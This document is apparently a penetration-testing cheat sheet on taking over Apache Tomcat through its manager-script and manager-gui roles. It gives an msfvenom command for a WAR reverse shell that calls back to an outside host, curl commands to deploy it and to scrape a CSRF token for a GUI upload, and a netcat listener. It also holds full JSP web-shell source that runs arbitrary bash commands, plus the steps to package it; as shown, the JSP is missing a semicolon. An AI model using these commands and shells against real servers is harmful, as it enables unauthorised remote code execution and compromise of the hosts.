Tomcat
Manager-script Role
Steps to exploit the Apache Tomcat manager-script role
Generate WAR reverse shell:
msfvenom -p java/shell_reverse_tcp lhost=4.3.2.1 lport=4444 -f war -o reverse.war
Then deploy the WAR file to the target’s tomcat service with manager access
(V6 and under use /manager/deploy path instead of /manager/text/deploy)
curl -v -u user:'password' -T 'reverse.war' 'http://1.2.3.4:8080/manager/text/deploy?path=/cmd&update=true'
Start your
netcat listener:nc -lvp 4444
Call war application to trigger reverse shell execution and initiate the connection:
curl https://1.2.3.4:8080/cmd
Manager-gui Role
Sometimes only the GUI role is enabled for administration,
and you don’t have direct access to it because of network limitation of tomcat or host.
# Load web page to retrieve cookies to cookies file and CSRF token
CSRF=$(curl -sS "http://user:password@localhost:8080/manager/html" -b cookies -c cookies | grep jsession | tail -n1 | sed 's#.*CSRF_NONCE=\([^\"]*\).*#\1#')
# Deploy war
curl -v -b cookies -c cookies -F "deployWar=@pwn.war" "http://user:password@localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=$CSRF"
WAR/JSP Creation
Create index.jsp file
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String[] args = {"/bin/bash", "-c", cmd}
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(args);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
Create war
mkdir pwn/ && cp index.jsp pwn/ && cd pwn/
jar -cvf ../pwn.war * && cd ../